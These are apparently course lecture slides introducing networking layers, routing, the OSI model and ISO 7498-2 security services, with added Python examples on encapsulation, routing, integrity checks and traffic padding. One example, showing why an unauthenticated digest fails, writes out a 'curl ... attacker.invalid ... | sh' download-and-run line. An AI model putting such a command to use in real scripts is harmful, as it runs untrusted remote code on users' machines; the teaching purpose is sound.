Networking and Network Security

Network Security
Lecture 1, Part 1
Introduction to Networking
Objectives of Lecture
CINS/F1-01
• Show how networks can be understood using a
layered approach.
• Introduce the OSI seven layer reference model.
• Introduce the concepts of internetworking and
routing.
• Understand the difference between network
protocols and services.
Contents
1.1 Extended example: how the Internet protocols fetch a web page
1.2 The concept of protocol layering
1.3 Internetworking and routing
1.4 The OSI seven layer model
1.1 Internet Protocols
How does a web browser application
retrieve data from a web server?
(Figure: Web Browser - Network - Web Server.)
Application Layer
• Users invoke applications which "speak" using an
application protocol.
• Applications interact with a transport protocol to
send or receive data.
• Application protocol in our example: Hypertext
Transfer Protocol (HTTP).
• Other application protocols: FTP, SMTP, DNS,
SMB, …
Application Layer Example
• HTTP outline:
– GET /directory/dirsearch.html HTTP/1.1
– Host: news.bbc.co.uk
– Other fields also included (e.g. client application
identifier, encoding methods,…)
Transport Layer
• Provides end-to-end communication between
applications.
• Transport protocol in our example: Transmission
Control Protocol (TCP)
– a reliable, connection-oriented transport protocol.
• Divides the stream of application data into
segments (the slides call them packets).
• Interacts with the Internet layer to send or receive data.
• In general, a transport protocol may be
– reliable or unreliable,
– connection-oriented or connectionless,
– and flow may or may not be regulated.
• Other transport protocol: UDP (unreliable,
connectionless). ICMP, sometimes listed alongside
them, is carried directly in IP and is really a control
protocol of the Internet layer, not a transport protocol.
Transport Layer Example
• TCP outline:
– Source Port: 1081
– Destination Port: 80
– Checksum: 0xa858
– Other header fields and payload
(Figure: the TCP segment so far.)
TCP header: Src: 1081 Dst: 80 Chksum: 0xa858
TCP payload (HTTP message):
GET /directory/dirsearch.html HTTP/1.1
Host: news.bbc.co.uk
Internet Layer
• Responsible for routing communications
between one machine and another.
• Accepts requests to send packets to
destination address.
• Internet Protocol (IP) encapsulates packets in
IP datagram with IP header and uses routing
algorithm to decide whether to send directly or
indirectly.
Internet Layer Example
• IP outline:
– Time to live: 128
– Header checksum: 0x57d1
– Source: pelican (192.168.0.40)
– Destination: news.bbc.co.uk (192.168.0.50)
– Other header fields and payload
(Figure: the IP datagram so far.)
IP datagram header: Src: 192.168.0.40 Dst: 192.168.0.50 TTL: 128
IP payload:
TCP header: Src: 1081 Dst: 80 Chksum: 0xa858
HTTP message:
GET /directory/dirsearch.html HTTP/1.1
Host: news.bbc.co.uk
Network Interface Layer
• Accepts IP datagrams and prepares for
transmission over specific physical network.
• May be a simple device driver (e.g. an Ethernet
driver) or a complex subsystem with further
data link protocols (e.g. in an ATM network).
• Output of the network interface layer is a signal
suitable for transmission on a particular
physical medium.
Network Interface Layer Example
• Ethernet outline:
– Destination: 00:a0:cc:54:1d:4e
– Source: 00:e0:81:10:19:fc
– Type: IP
– Other header fields and payload
(Figure: the complete Ethernet frame.)
Ethernet header: Src: 00:e0:81:10:19:fc Dst: 00:a0:cc:54:1d:4e Type: IP
IP header: Src: 192.168.0.40 Dst: 192.168.0.50 TTL: 128
TCP header: Src: 1081 Dst: 80 Chksum: 0xa858
HTTP message:
GET /directory/dirsearch.html HTTP/1.1
Host: news.bbc.co.uk
Physical Layer
• A layer representing the actual communications
medium.
– Could be an Ethernet cable, optical fibre, wireless
link, telephone wire or even a carrier pigeon
(http://www.ietf.org/rfc/rfc1149.txt).
– Sometimes not considered as a separate layer in
TCP/IP networking; sometimes not considered part
of TCP/IP at all.
– Hence the confusion over whether there are
really 4 or 5 layers in TCP/IP.
At The Server
• The server contains a set of layers matching those at
the client:
– The physical signal is presented to the server’s network
interface layer which reconstructs the ethernet frame.
– The network interface layer extracts an IP datagram and
passes it up to the Internet layer.
– The Internet layer checks the datagram, extracts a TCP
segment and passes it up to the transport layer.
– The transport layer checks for errors (the TCP checksum)
and passes the TCP payload (an HTTP message) on to the
application layer.
– The web server at the application layer receives the HTTP
message and processes it.
• Return messages from web server to web browser are
handled in the same way.
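The encapsulation walked through on the preceding slides, and the layer-by-layer unwrapping just described for the server, as an added Python example (this code is not part of the lecture slides). It uses the slides' HTTP request, addresses, ports and MAC addresses; the TCP sequence and acknowledgement numbers, flags and window, and the IP identification and fragment fields are assumed values, so the checksums it computes will differ from the 0xa858 and 0x57d1 shown on the slides. Each receiving layer checks its own header (EtherType, IP header checksum, protocol number, TCP checksum over the pseudo-header) before handing the payload up, which is the "checks for errors" step on the slide.

```python
"""Encapsulate an HTTP request into TCP, IP and Ethernet, then decapsulate it
the way the server's stack does. Added example; values marked 'assumed' are
not from the slides."""
import struct

# Values taken from the slides
HTTP_MESSAGE = (b"GET /directory/dirsearch.html HTTP/1.1\r\n"
                b"Host: news.bbc.co.uk\r\n\r\n")
SRC_IP, DST_IP = "192.168.0.40", "192.168.0.50"
SRC_PORT, DST_PORT = 1081, 80
SRC_MAC, DST_MAC = "00:e0:81:10:19:fc", "00:a0:cc:54:1d:4e"
ETHERTYPE_IP, IPPROTO_TCP, TTL = 0x0800, 6, 128


def internet_checksum(data: bytes) -> int:
    """RFC 1071 checksum: one's complement of the one's complement sum of the
    16-bit words (an odd trailing byte is padded with a zero byte). Over data
    that already carries a correct checksum the result is 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ip_bytes(addr: str) -> bytes:
    return bytes(int(o) for o in addr.split("."))


def build_tcp_segment(payload: bytes) -> bytes:
    # Transport layer: 20-byte TCP header in front of the HTTP message.
    seq, ack, flags, window = 1, 1, 0x18, 65535      # assumed (PSH|ACK)
    hdr = struct.pack("!HHIIBBHHH", SRC_PORT, DST_PORT, seq, ack,
                      5 << 4, flags, window, 0, 0)
    # The TCP checksum covers a pseudo-header (addresses, protocol, length)
    # as well as the header and payload, binding the segment to the IP layer.
    pseudo = ip_bytes(SRC_IP) + ip_bytes(DST_IP) + struct.pack(
        "!BBH", 0, IPPROTO_TCP, len(hdr) + len(payload))
    csum = internet_checksum(pseudo + hdr + payload)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:] + payload


def build_ip_datagram(segment: bytes) -> bytes:
    # Internet layer: 20-byte IPv4 header; identification is assumed, DF set.
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(segment), 0x1234,
                      0x4000, TTL, IPPROTO_TCP, 0,
                      ip_bytes(SRC_IP), ip_bytes(DST_IP))
    csum = internet_checksum(hdr)        # header checksum covers the header only
    return hdr[:10] + struct.pack("!H", csum) + hdr[12:] + segment


def build_ethernet_frame(datagram: bytes) -> bytes:
    # Network interface layer: Ethernet II header (the FCS is added by the NIC).
    return (bytes.fromhex(DST_MAC.replace(":", "")) +
            bytes.fromhex(SRC_MAC.replace(":", "")) +
            struct.pack("!H", ETHERTYPE_IP) + datagram)


def encapsulate(http_message: bytes) -> bytes:
    return build_ethernet_frame(build_ip_datagram(build_tcp_segment(http_message)))


def decapsulate(frame: bytes) -> dict:
    """Walk back up the stack as the server does; each layer checks its own
    header before handing the payload upward. Raises ValueError on failure."""
    dst_mac, src_mac = frame[:6], frame[6:12]
    if struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IP:
        raise ValueError("frame does not carry an IP datagram")
    datagram = frame[14:]
    ihl = (datagram[0] & 0x0F) * 4
    ip_hdr = datagram[:ihl]
    if internet_checksum(ip_hdr) != 0:
        raise ValueError("IP header checksum failed")
    total_len = struct.unpack("!H", ip_hdr[2:4])[0]
    ttl, proto = ip_hdr[8], ip_hdr[9]
    if proto != IPPROTO_TCP:
        raise ValueError("datagram does not carry TCP")
    segment = datagram[ihl:total_len]
    pseudo = ip_hdr[12:20] + struct.pack("!BBH", 0, IPPROTO_TCP, len(segment))
    if internet_checksum(pseudo + segment) != 0:
        raise ValueError("TCP checksum failed")
    src_port, dst_port = struct.unpack("!HH", segment[:4])
    data_offset = (segment[12] >> 4) * 4
    return {
        "src_mac": ":".join("%02x" % b for b in src_mac),
        "dst_mac": ":".join("%02x" % b for b in dst_mac),
        "src_ip": ".".join(str(b) for b in ip_hdr[12:16]),
        "dst_ip": ".".join(str(b) for b in ip_hdr[16:20]),
        "ttl": ttl, "src_port": src_port, "dst_port": dst_port,
        "payload": segment[data_offset:],
    }


def corruption_detected(frame: bytes, index: int) -> bool:
    """Flip one bit at the given offset and report whether some layer rejects it."""
    damaged = bytearray(frame)
    damaged[index] ^= 0x01
    try:
        decapsulate(bytes(damaged))
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    wire = encapsulate(HTTP_MESSAGE)
    print(len(wire), "bytes on the wire")
    print(decapsulate(wire))
```

A bit flipped in the IP or TCP part of the frame is caught by the corresponding layer; a flip in the Ethernet header is not, because the frame check sequence that would catch it is generated and checked by the NIC and is not modelled here. These checksums detect accidents, not attackers: anyone who can change the bytes can recompute them, which is what the integrity services in Part 2 address.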
1.2 Protocol Layering
(Figure: the same stack on two hosts, with the unit each layer exchanges with its peer.)
Host A                                      Host B
Application Layer       -- Message --       Application Layer
Transport Layer         -- Packet --        Transport Layer
Internet Layer          -- Datagram --      Internet Layer
Network Interface Layer -- Frame --         Network Interface Layer
                   Physical Network
Protocol Layering
(Figure: the web example mapped onto the stack.)
Web Browser                                 Web Server
Application Layer       -- HTTP Message --  Application Layer
Transport Layer         -- TCP Packet --    Transport Layer
Internet Layer          -- IP Datagram --   Internet Layer
Network Interface Layer -- Ethernet Frame -- Network Interface Layer
                   Physical Network
Protocol Hierarchies
• Protocols are stacked vertically as series of
‘layers’.
• Each layer offers services to layer above
through an interface, shielding implementation
details.
• Layer n on one machine communicates with
layer n on another machine (they are peer
processes/entities) using Layer n Protocol.
• The entire hierarchy is called a protocol stack
– e.g. the TCP/IP protocol stack
Layers, Protocols & Interfaces
(Figure: two machines, each with a stack of layers 1 to n. Layer k on one machine talks to layer k on the other using the layer k protocol; on each machine, adjacent layers communicate across the layer k-1/k interface; layer 1 on both sides sits on the physical communications medium.)
Layer and Interface Design
• An important design objective is ‘clean’
interfaces, having minimal set of well-defined
services.
• Use of protocol layering and clean-cut
interfaces enables:
– easy replacement of individual layers
– designers and implementers to focus on solving one
sub-problem at a time
– independent implementations of the same layer to
inter-operate
– minimisation of inter-layer communications
– diagnosis of faults, errors, congestion,…
Virtual & Actual Communications
• Important to understand difference between:
– virtual and actual communications,
– protocols and interfaces.
• Peer processes ‘think’ of communications as
being ‘horizontal’ using protocol.
• Actual communication is via interfaces (and
the physical communications medium).
• The peer process idea is key to network design.
Protocol Layering – The Downside
• Protocol layering does not solve all networking
problems!
• Some issues need to be addressed at many
layers, e.g:
– need to address data (say who it's for),
– possible need for setting up connections,
– data transfer rules (simplex, half-duplex, ...),
– error management,
– deal with message component re-ordering,
– flow control,
– routing.
• Layering can introduce inefficiencies.
1.3 Internetworking and Routing
• No single networking technology can satisfy all
requirements.
• Universal interconnection is desired.
• Protocols allow communication between nodes
without understanding underlying mechanisms.
• Internetworking is the process by which a
group of disparate, heterogeneous networks can
be linked to form a single logical network.
• The Internet is just such a collection
– universal interconnection is achieved through
coordinated IP addressing and use of the IP protocol.
Routing
Routing is the mechanism used to transfer data
between networks to reach the correct
destination.
(Figure: Web Browser on Network A - Router - Network B with the Web Server.)
In TCP/IP, routing takes place
at the IP layer: routers are not
aware of transport and
application layers.
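The forwarding decision the Internet layer makes for each datagram (deliver directly to the destination host, or indirectly via a router chosen by longest-prefix match), as an added Python example for the router in the figure above; it is not code from the slides. The routing table, interface names and next-hop addresses are constructed here. Because the forwarding lookup consults only the destination address, the example also includes a reverse-path check on the source address, which is the usual way a router rejects datagrams whose claimed source could not have arrived on that interface.

```python
"""Forwarding at the Internet layer: longest-prefix match over a routing
table, direct versus indirect delivery, and a reverse-path check on the
source address. Added example; the table is constructed for the router in
the slide's figure (Network A on eth0, Network B on eth1)."""
import ipaddress

# Constructed forwarding table: (destination prefix, next hop, interface).
# A next hop of None means the prefix is directly attached.
ROUTES = [
    ("192.168.0.0/24", None, "eth0"),            # Network A (web browser side)
    ("192.168.1.0/24", None, "eth1"),            # Network B (web server side)
    ("10.1.0.0/16", "192.168.1.254", "eth1"),    # a remote site via another router
    ("10.1.5.0/24", "192.168.1.253", "eth1"),    # more specific prefix inside it
    ("0.0.0.0/0", "192.168.0.1", "eth0"),        # default route
]


def lookup(dst: str, routes=ROUTES):
    """Longest-prefix match. Returns (prefix, next hop, interface, delivery),
    where delivery is 'direct' (destination is on an attached link, send to it)
    or 'indirect' (hand to the next-hop router). Only the destination address
    is examined: nothing above the IP header is looked at."""
    addr = ipaddress.ip_address(dst)
    best = None
    for prefix, next_hop, iface in routes:
        net = ipaddress.ip_network(prefix)
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, next_hop, iface)
    if best is None:
        raise LookupError("no route to %s" % dst)
    net, next_hop, iface = best
    if next_hop is None:
        return (str(net), dst, iface, "direct")
    return (str(net), next_hop, iface, "indirect")


def reverse_path_ok(src: str, arrival_iface: str, routes=ROUTES) -> bool:
    """Strict reverse-path check: accept a datagram only if the interface it
    arrived on is the one this router would use to reach its source address.
    A source address spoofed from the 'wrong' side of the router fails."""
    try:
        return lookup(src, routes)[2] == arrival_iface
    except LookupError:
        return False


if __name__ == "__main__":
    for dst in ("192.168.1.50", "10.1.5.9", "10.1.7.9", "8.8.8.8"):
        print(dst, "->", lookup(dst))
    print("192.168.0.40 arriving on eth1 accepted?",
          reverse_path_ok("192.168.0.40", "eth1"))
```

Strict reverse-path checking is only as good as the table: with the default route on eth0, any source that matches no more specific prefix is accepted on eth0, so in practice the check is applied on interfaces whose address space is well defined (a LAN or customer side), not on a default-route interface.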
Protocol Layering and Routing
(Figure: Host A and Host B each run the full stack; the router between them runs only the Internet and network interface layers.)
Host A                       Router                          Host B
Application Layer --------- HTTP Message ------------------- Application Layer
Transport Layer ----------- TCP Packet --------------------- Transport Layer
Internet Layer -- IP Datagram -- Internet Layer -- IP Datagram -- Internet Layer
Network Interface -- Ethernet Frame -- Network Interface -- Ethernet Frame -- Network Interface
      Physical Network                      Physical Network
1.4 The OSI Reference Model
• OSI Reference Model – an internationally
standardised network architecture.
• An abstract representation of an ideal network
protocol stack; the OSI protocols themselves saw
little deployment, and the model is used mainly as
a reference for describing real stacks such as TCP/IP.
• OSI = Open Systems Interconnection.
• Specified in ISO 7498-1.
• Model has 7 layers.
The OSI Model
Layer 7: Application Layer
Layer 6: Presentation Layer
Layer 5: Session Layer
Layer 4: Transport Layer
Layer 3: Network Layer
Layer 2: Data Link Layer
Layer 1: Physical Layer
Lower/Upper Layers
• Layers 1-4 often referred to as lower layers.
• Layers 5-7 are the upper layers.
• Lower layers relate more closely to the
communications technology.
• Layers 1 – 3 manage the communications
subnet.
– the entire set of communications nodes required to
manage comms. between a pair of machines.
• Layers 4 – 7 are true ‘end-to-end’ protocols.
• Upper layers relate to application.
Layer 7: Application Layer
• Home to wide variety of protocols for specific
user needs, e.g.:
– virtual terminal service,
– file transfer,
– electronic mail,
– directory services.
Layer 6: Presentation Layer
• Concerned with representation of transmitted
data.
• Deals with different data representations.
– ASCII or EBCDIC,
– one's complement or two's complement,
– byte ordering conventions,
– floating point conventions (IEEE or proprietary).
• Also deals with data compression.
Layer 5: Session Layer
• Allows establishment of sessions between
machines, e.g. to
– allow remote logins
– provide file transfer service.
• Responsible for:
– dialogue control
• which entity sends when with half-duplex communications.
– token management
• E.g. control which entity can perform an operation on
shared data.
– synchronisation
• E.g. insertion of checkpoints in large data transfers.
Layer 4: Transport Layer
• Basic function is to take data from Session
Layer, split it up into smaller units, and ensure
that the units arrive correctly.
• Concerned with efficient provision of service.
– maybe multiple connections per session or multiple
sessions per connection.
• The Transport Layer also determines the ‘type
of service’ to provide to the Session Layer.
– most commonly, error-free, point-to-point, with
guarantee of correct ordering of data.
– could be transport of isolated messages only (no
ordering guarantees) or broadcast.
Layer 3: Network Layer
• Provides uniform addressing scheme for
network addresses.
• Shields upper layers from details of lower
layers.
• A key responsibility is control of routing.
• Routing can be based on:
– static tables,
– determined at start of session,
– highly dynamic (varying for each packet depending
on network load).
• Also responsible for congestion control and
usage monitoring.
Layer 2: Data Link Layer
• Provides reliable, error-free service on top of
raw Layer 1 service.
– corrects errors at the ‘bit’ level.
• Breaks data into frames.
– requires creation of frame boundaries using special
bit sequences.
• Frames used to manage errors via
acknowledgements and selective frame
retransmission.
Layer 1: Physical Layer
• Concerned with bit transmission over physical
channel.
• Issues include:
– definition of 0/1,
– whether channel simplex/duplex,
– connector design.
• Mechanical, electrical, procedural matters.
Internet Protocols vs OSI
TCP/IP layer              OSI layer
5  Application            7  Application
                          6  Presentation
                          5  Session
4  TCP (Transport)        4  Transport
3  IP (Network)           3  Network
2  Network Interface      2  Data Link
1  Hardware               1  Physical
Services in the OSI Model
• In the OSI model, each layer provides services to
the layer above, and 'consumes' services provided
by the layer below.
• Active elements in a layer are called entities.
• Entities in the same layer on different machines are
called peer entities.
Services and Protocols
• Service = set of primitives provided by one
layer to layer above.
• Service defines what layer can do (but not how
it does it).
• Protocol = set of rules governing data
communication between peer entities, i.e.
format and meaning of frames/packets.
• Service/protocol decoupling very important.
Layering Principles
(Figure: an (n+1) entity, the service user, exchanges (n+1) PDUs with its peer using the layer n+1 protocol. It hands each one as an SDU to the (n) entity, the service provider, through the layer n Service Access Point (SAP); the (n) entity wraps it in an (n) PDU, which it exchanges with its own peer using the layer n protocol.)
PDU - Protocol Data Unit
SDU - Service Data Unit
Connections
• Layers can offer connection-oriented or
connectionless services.
• Connection-oriented like telephone system.
• Connectionless like postal system.
– not all applications need connections.
• Each service has an associated quality of service (e.g. reliable or unreliable).
Reliability Issues
• A reliable service never loses or corrupts data from the
user's point of view: losses and errors on the path are
detected and repaired (e.g. by retransmission).
• Reliable service costs more.
• Typical application for reliable service is file
transfer.
• Typical application not needing reliable service
is voice traffic.
IC3 - Network Security
Lecture 1, Part 2
Introduction to Network Security
Objectives of Lecture
CINS/F1-01
• Understand why security should be a
fundamental consideration when designing and
operating networks.
• Examine the primary enabling threats and
fundamental threats to security for networks.
• Introduce security services and mechanisms,
and show how they can be used to counter
threats.
• Study the provision of security services at
different network layers in ISO 7498-2.
Contents
1.5 Why network security?
1.6 Security policies for networks
1.7 Security threats for networks
1.8 Security services and mechanisms
1.9 Security services and layers
1.5 Why Network Security?
• Organisations and individuals are increasingly reliant
on networks of all kinds for day-to-day operations:
– e-mail used in preference to letter, fax, telephone for many
routine communications.
– B2B and C2B e-commerce still growing rapidly.
– the Internet is a vast repository of information of all kinds:
competitors and their prices, stock markets, cheap flights,….
– increased reliance on networks for supply chains of all kinds:
from supermarkets to aircraft components.
– utility companies control plant, banks move money,
governments talk to citizens over networks.
– growth of mobile telephony for voice and data.
Why Network Security?
• Networks are becoming increasingly inter-connected
and their security consequently more complex:
– if I send sensitive data over my internal network, then who else
can see it or even alter it? My employees? My competitors?
– can a hacker who gets into my internal network then get
access to other resources (computer accounts, stored data)?
Can he use my network as a stepping-off point for further
attacks? Am I then liable?
– a compelling Internet presence is essential for my company,
but if someone can see my website, can they alter it too?
– how can consumers trust that a given website is that of a
reputable company and not one who will mis-use their credit
card details?
Why Network Security?
• Safeguarding the confidentiality, integrity and
availability of data carried on these various networks is
therefore essential.
• Authenticity and accountability are often also important:
who did what and when?
• It’s not only about security of Internet-connected
systems.
– Insider threats are often more potent than threats originating on
the Internet.
• It’s not only about TCP/IP networks.
– Many networks use special-purpose protocols and
architectures.
– However TCP/IP dominates in LANs and the Internet.
1.6 Security Policies for Networks
• In this and the following sections, we follow the
approach of ISO7498-2
– a companion document to ISO7498-1 (the seven
layer model),
– provides a useful overview of the security issues
pertinent to networks,
– equips us with a handy set of definitions to fix our
terminology.
Security Policies for Networks
• In a secure system, the rules governing
security behaviour should be made explicit in
the form of an Information Security Policy.
• Security policy: ‘the set of criteria for the
provision of security services’
– essentially, a set of rules
– may be very high level or quite detailed.
• Security domain: the scope of application of a
security policy.
– where, to what information and to whom the policy
applies.
Security Policies for Networks
• A network security policy should interpret the
overall Information Security Policy in the
context of the networked environment:
• Defines what is the responsibility of the network
and what is not.
• Describes what security is to be available from
the network.
• Describes rules for using the network.
• Describes who is responsible for the
management and security of the network.
Generic Security Policy
• A generic authorisation policy (from ISO 7498-2):
'Information may not be given to, accessed by, nor
permitted to be inferred by, nor may any resource be
used by, those not appropriately authorised.'
• Possible basis for more detailed policy: needs
lots of refinement to produce final document:
– What information?
– What resources?
– Who is authorised and for what?
– What about availability?
The Security Life-Cycle
• A generic model for the security life-cycle,
including network security issues, is as follows:
– define security policy,
– analyse security threats (according to policy) and
associated risks, given existing safeguards,
– define security services to meet/reduce threats, in
order to bring risks down to acceptable levels,
– define security mechanisms to provide services,
– provide on-going management of security.
• Security policy in general will be covered in
more detail in IC1.
1.7 Security Threats for Networks
• A threat is:
– a person, thing, event or idea which poses some
danger to an asset (in terms of confidentiality,
integrity, availability or legitimate use).
– a possible means by which a security policy may be
breached.
• An attack is a realisation of a threat.
• Safeguards are measures (e.g. controls,
procedures) to protect against threats.
• Vulnerabilities are weaknesses in safeguards.
Risk
• Risk is a measure of the cost of a vulnerability
(taking into account probability of a successful
attack).
• Risk analysis determines whether expenditure
on new or better safeguards is warranted.
• Risk analysis can be quantitative or qualitative.
• Risk analysis will be covered in more detail in
IC1.
Threats
Threats can be classified as:
• deliberate (e.g. hacker penetration);
• accidental (e.g. a sensitive file being sent to the
wrong address).
Deliberate threats can be further sub-divided:
• passive (e.g. monitoring, wire-tapping);
• active (e.g. changing the value of a financial
transaction).
• In general passive threats are easier to realise
than active ones.
Fundamental Threats
• Four fundamental threats (matching four
'standard' security goals: confidentiality,
integrity, availability, legitimate use):
– Information leakage,
– Integrity violation,
– Denial of service,
– Illegitimate use.
(There are other ways to classify threats)
Fundamental Threat Examples
• Information Leakage
– Prince Charles mobile phone calls, 1993.
• Integrity violation
– USA Today, falsified reports of missile attacks on
Israel, 7/2002.
• Denial of service
– Yahoo, 2/2000, 1Gbps.
– http://grc.com/dos/grcdos.htm
• Illegitimate use
– Cloning of first generation mobile phone identities.
– Phone phreaking.
Primary Enabling Threats
• Realisation of any of these primary enabling
threats can lead directly to a realisation of a
fundamental threat:
– Masquerade,
– Bypassing controls,
– Authorisation violation,
– Trojan horse,
– Trapdoor.
• First three are penetration threats, last two are
planting threats.
Primary Enabling Threat Examples
• Masquerade
– Royal Opera House web site, 8/2002 – Information Leakage
– Phishing attacks on on-line bank accounts – Illegitimate Use
• Bypassing controls
– ADSL modem passwords – Illegitimate Use
• Authorisation violation
– Students running mp3 download site from University
computers – Illegitimate Use
• Trojan horse
– PWSteal.Trojan, 1999 – Information Leakage
• Trapdoor
– Ken Thompson, trapdoor in the Unix login program inserted
by a modified C compiler (c. 1975), described in Reflections
on Trusting Trust (Turing Award lecture, 1984) - Illegitimate Use
1.8 Security Services and Mechanisms
• A security threat is a possible means by which
a security policy may be breached (e.g. loss of
integrity or confidentiality).
• A security service is a measure which can be
put in place to address a threat (e.g. provision
of confidentiality).
• A security mechanism is a means to provide a
service (e.g. encryption, digital signature).
Security Service Classification
• Security services in ISO 7498-2 are a special class of
safeguard applying to a communications environment.
• Five main categories of security service:
– Authentication (including entity authentication and
origin authentication),
– Access control,
– Data confidentiality,
– Data integrity,
– Non-repudiation.
• Sixth category: “other” – includes physical security,
personnel security, computer security, life-cycle
controls,…
Authentication
• Entity authentication provides checking of a
claimed identity at a point in time.
• Typically used at start of a connection.
• Addresses masquerade and replay threats.
• Origin authentication provides verification of
source of data.
• Does not protect against replay or delay.
• Lots of examples in Lectures 4, 5 and 6 on
secure protocols.
Access Control
• Provides protection against unauthorised use
of resource, including:
– use of a communications resource,
– reading, writing or deletion of an information
resource,
– execution of a processing resource.
• Example: file permissions in Unix/NT file
systems.
Data Confidentiality
• Protection against unauthorised disclosure of
information.
• Four types:
– Connection confidentiality,
– Connectionless confidentiality,
– Selective field confidentiality,
– Traffic flow confidentiality.
• Example: encrypting routers as part of the SWIFT
funds transfer network.
• Example: winnowing and chaffing
(http://theory.lcs.mit.edu/~rivest/chaffing.txt).
Data Integrity
• Provides protection against active threats to the
validity of data.
• Five types:
– Connection integrity with recovery,
– Connection integrity without recovery,
– Selective field connection integrity,
– Connectionless integrity,
– Selective field connectionless integrity.
• Example: MD5 hashes on software at
http://www.apache.org/dist/httpd/binaries/linux/
– Caveat: MD5 is no longer collision resistant, and a digest
fetched from the same server as the software only detects
transmission errors. To detect substitution by whoever controls
the server or the path, the digest (or a signature over it) must
come from an independently authenticated source; projects now
publish SHA-256/SHA-512 digests and PGP signatures.
• Example: AH protocol in IPSec (Lecture 5).
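The difference between a data integrity mechanism (a hash) and an origin authentication mechanism (a keyed MAC), using the software download example above, as an added Python example that is not part of the slides. The archive, its published digest and the key are all constructed here; SHA-256 is used in place of MD5, which is no longer collision resistant. The keyed variant (HMAC) authenticates origin to anyone holding the key, but it does not give non-repudiation: the verifier holds the same key and could have produced the tag itself, which is why the service on the next slide needs a digital signature rather than a MAC.

```python
"""A hash as a data integrity mechanism versus a keyed MAC as an origin
authentication mechanism, over a constructed 'software download'. Added
example; archive contents, digest and key are all constructed here."""
import hashlib
import hmac
import secrets

# Constructed stand-ins for a downloaded archive and the digest published beside it.
ARCHIVE = b"#!/bin/sh\necho 'installing httpd'\n"
PUBLISHED_DIGEST = hashlib.sha256(ARCHIVE).hexdigest()

# Constructed key known only to publisher and verifier (never published).
PUBLISHER_KEY = secrets.token_bytes(32)


def verify_download(data: bytes, expected_hex: str, algorithm: str = "sha256") -> bool:
    """Integrity check: recompute the digest and compare in constant time.
    Catches accidental corruption, and substitution only if expected_hex
    itself came from a source the attacker could not alter."""
    digest = hashlib.new(algorithm, data).hexdigest()
    return hmac.compare_digest(digest, expected_hex)


def attacker_substitutes(data: bytes):
    """Model an attacker who controls the download server (or the path to it):
    they replace the archive AND republish a digest that matches it."""
    evil = data + b"curl http://attacker.invalid/x | sh\n"   # constructed payload
    return evil, hashlib.sha256(evil).hexdigest()


def tag(data: bytes, key: bytes) -> str:
    """HMAC-SHA256: integrity plus origin authentication to a holder of key.
    Without the key an attacker cannot produce a tag that verifies, so
    republishing a 'matching' tag is no longer possible."""
    return hmac.new(key, data, "sha256").hexdigest()


def verify_tag(data: bytes, key: bytes, expected: str) -> bool:
    return hmac.compare_digest(tag(data, key), expected)


if __name__ == "__main__":
    evil, evil_digest = attacker_substitutes(ARCHIVE)
    print("substituted archive passes plain digest check:",
          verify_download(evil, evil_digest))
    print("substituted archive passes keyed check:",
          verify_tag(evil, PUBLISHER_KEY, tag(ARCHIVE, PUBLISHER_KEY)))
```

hmac.compare_digest is used for both comparisons so that a verifier exposed to an attacker does not leak, through timing, how many leading characters of a guessed digest or tag were right.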
Non-repudiation
• Protects against a sender of data denying that
data was sent (non-repudiation of origin).
• Protects against a receiver of data denying that
data was received (non-repudiation of delivery).
• Example: analogous to signing a letter and
sending it via recorded delivery.
• Example: signatures in S/MIME secure e-mail
system (Lecture 9).
Security Mechanisms
• Exist to provide and support security services.
• Can be divided into two classes:
– Specific security mechanisms, used to provide
specific security services, and
– Pervasive security mechanisms, not specific to
particular services.
Specific Security Mechanisms
• Eight types:
– encipherment,
– digital signature,
– access control mechanisms,
– data integrity mechanisms,
– authentication exchanges,
– traffic padding,
– routing control,
– notarisation.
Specific Mechanisms 1
• Encipherment mechanisms = encryption
algorithms.
– Can provide data and traffic flow confidentiality.
– Covered in detail in IC2
• Digital signature mechanisms
– signing procedure (private),
– verification procedure (public).
– Can provide non-repudiation, origin authentication
and data integrity services.
– Also addressed in detail in IC2
• Both can be basis of some authentication
exchange mechanisms.
Specific Mechanisms 2
• Access Control mechanisms
– A server using client information to decide whether
to grant access to resources
• E.g. access control lists, capabilities, security labels.
– A major topic in IC4
• Data integrity mechanisms
– Protection against modification of data.
• Provide data integrity and origin authentication services.
Also basis of some authentication exchange mechanisms.
– Discussed further in IC2
• Authentication exchange mechanisms
– Provide entity authentication service.
– Covered in detail in IC3 Lecture 4.
Specific Mechanisms 3
• Traffic padding mechanisms
– The addition of ‘pretend’ data to conceal real volumes of data
traffic.
– Provides traffic flow confidentiality.
• Routing control mechanisms
– Used to prevent sensitive data using insecure channels.
– E.g. route might be chosen to use only physically secure
network components.
• Notarisation mechanisms
– Integrity, origin and/or destination of data can be guaranteed by
using a 3rd party trusted notary.
• Notary typically applies a cryptographic transformation to the data.
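Traffic padding as described above, as an added Python example that is not from the slides: every transmission is padded to a multiple of a fixed bucket size so that an observer of an encrypted link sees only bucket counts, and dummy transmissions fill idle periods. The bucket size and messages are constructed. Padding must be applied before encryption, so that the length prefix and the filler are inside the ciphertext.

```python
"""Traffic padding: fixed-size transmissions hide real message lengths from an
on-path observer. Added example; bucket size and messages are constructed."""
import os
import struct

BUCKET = 64   # assumed fixed transmission unit in bytes


def pad(msg: bytes, bucket: int = BUCKET) -> bytes:
    """2-byte length prefix + message + random filler up to the next multiple
    of bucket. A message longer than one bucket still occupies a whole number
    of buckets, so only its size class leaks, not its exact length."""
    if len(msg) > 0xFFFF:
        raise ValueError("message too long for a 2-byte length prefix")
    body = struct.pack("!H", len(msg)) + msg
    return body + os.urandom((-len(body)) % bucket)


def unpad(blob: bytes) -> bytes:
    """Recover the real message; reject a prefix that points past the data."""
    (n,) = struct.unpack("!H", blob[:2])
    if 2 + n > len(blob):
        raise ValueError("length prefix exceeds transmission")
    return blob[2:2 + n]


def dummy(bucket: int = BUCKET) -> bytes:
    """'Pretend' traffic: an empty message padded to a full bucket, sent when
    there is nothing real to send so that silence is not observable either."""
    return pad(b"", bucket)


def observed_sizes(transmissions) -> list:
    """What an eavesdropper learns from transmission sizes alone."""
    return sorted({len(t) for t in transmissions})


# Constructed messages whose lengths would otherwise distinguish them.
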